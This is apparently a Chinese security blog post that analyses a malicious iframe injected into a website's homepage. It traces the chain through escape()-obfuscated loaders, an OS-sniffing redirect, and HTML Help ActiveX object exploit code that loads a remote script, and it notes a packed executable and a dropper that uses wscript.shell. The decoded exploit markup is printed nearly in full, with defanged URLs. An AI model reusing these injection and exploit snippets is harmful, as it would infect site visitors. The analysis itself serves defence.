endurer　原创

 

网站首页被插入恶意代码：

 

---

 

＜iframe src='hxxp://www.***hyap98.com/123/wawa.htm' width='0' height='0' frameborder='0'＞＜/iframe＞＜iframe src='hxxp://djloveqq.***go3.icpcn.com/cert/joke.htm' width='0' height='0' frameborder='0'＞＜/iframe＞

 

---

hxxp://www.***hyap98.com/123/wawa.htm的部分内容经过escape()加密，upescape()后为：

 

 

---

 

＜html＞
＜head＞
＜script language="javascript"＞
＜!--
var words="＜iframe src="hxxp://www.***hyap98.com/123/music.htm" width='0' height='0' frameborder='0'＞＜/iframe＞
＜iframe src="hxxp://www.***hyap98.com/rx/joke.htm" width='0' height='0' frameborder='0'＞＜/iframe＞"
function setnewwords()
{
var newwords;
newwords=unescape(words);
document.write(newwords);
}
setnewwords();
// --＞
＜/script＞
＜/head＞
＜body＞
＜/body＞
＜/html＞

 

---

 

hxxp://www.***hyap98.com/123/music.htm的部分内容经过escape()加密，upescape()后为：

 

---

 

＜html＞
＜head＞
＜script language="javascript"＞
＜!--
var words="＜embed type="audio/x-pn-realaudio-plugin"
src="music.smi"
controls="controlpanel,statusbar" height=95
width=150 autostart=true＞"
function setnewwords()
{
var newwords;
newwords=unescape(words);
document.write(newwords);
}
setnewwords();
// --＞
＜/script＞
＜/head＞
＜body＞
＜/body＞
＜/html＞

 

---

 

hxxp://www.***hyap98.com/rx/joke.htm的内容为(已去掉开头的多个空格)：

 

---

＜center＞＜font color=red＞对不起,您访问的页面不存在!＜/font＞＜center＞         ＜script language=javascript＞ie='windows';ver=navigator.appversion;if(!(ver.indexof('nt 5.0')==-1))ie='winnt';if(!(ver.indexof('windows 98')==-1)){ie='w98';}location.href=ie+'.htm';＜/script＞

 

 

---

 

此网页检查ie版本，并打开相应的网页windows.htm、wint.htm或w98.htm。

hxxp://www.***hyap98.com/rx/windows.htm的部分内容经过escape()加密，upescape()并去掉多余的起始空格后为：

 

---

＜html＞
＜head＞
＜script language="javascript"＞
＜!--
var words="＜script language=vscript src="young.gif"＞＜/script＞＜script language=vscript src="young.css"＞＜/script＞＜html＞＜body＞＜div style="display:none"＞＜object id="news526" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"＞＜param name="command" value="related topics, menu"＞＜param name="window" value="$global_ifl"＞＜param name="item1" value='command;/windows/help/apps.chm');＜/object＞＜object id="news215" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"＞＜param name="command" value="related topics, menu"＞＜param name="window" value="$global_ifl"＞＜param name="item1" value='command;javascript:eval("document.write(/"＜script language=jscript src=///"hxxp://www.***hyap98.com/rx/young.gif///"/"+string.fromcharcode(62)+/"＜/scr/"+/"ipt/"+string.fromcharcode(62))")'＞＜/object＞＜/div＞＜script＞news526.click();f1=1+1;f1=f1+2;settimeout("news215.click();",0);fu1=2;fu1=3+4;＜/script＞＜/body＞＜/html＞"
function setnewwords()
{
var newwords;
newwords=unescape(words);
document.write(newwords);
}
setnewwords();
// --＞
＜/script＞
＜/head＞
＜body＞
＜/body＞
＜/html＞

 

 

---

 

hxxp://www.***hyap98.com/rx/winnt.htm的部分内容经过escape()加密，upescape()并去掉多余的起始空格后为：

 

---

＜html＞
＜head＞
＜script language="javascript"＞
＜!--
var words="＜script language=vscript src="young.gif"＞＜/script＞＜script language=vscript src="young.css"＞＜/script＞＜html＞＜body＞＜div style="display:none"＞＜object id="news571" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"＞＜param name="command" value="related topics, menu"＞＜param name="window" value="$global_ifl"＞＜param name="item1" value='command;/winnt/help/apps.chm');＜/object＞＜object id="news577" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"＞＜param name="command" value="related topics, menu"＞＜param name="window" value="$global_ifl"＞＜param name="item1" value='command;javascript:eval("document.write(/"＜script language=jscript src=///"hxxp://www.***hyap98.com/rx/young.gif///"/"+string.fromcharcode(62)+/"＜/scr/"+/"ipt/"+string.fromcharcode(62))")'＞＜/object＞＜/div＞＜script＞news571.click();f1=1+1;f1=f1+2;settimeout("news577.click();",0);fu1=2;fu1=3+4;＜/script＞＜/body＞＜/html＞"

 

function setnewwords()
{
var newwords;
newwords=unescape(words);
document.write(newwords);
}
setnewwords();
// --＞
＜/script＞
＜/head＞
＜body＞
＜/body＞
＜/html＞

 

---

 

hxxp://www.***hyap98.com/rx/w98.htm的大小为0。

hxxp://www.***hyap98.com/rx/young.css其实是个加过壳的pe可执行文件。

hxxp://www.***hyap98.com/rx/young.gif其实是个利用系统漏洞的网页文件，访问注册表，并利用wscript.shell复制文件young.css，创建文件c:/wins.bat，c:/boot.hta，c:/wins.exe。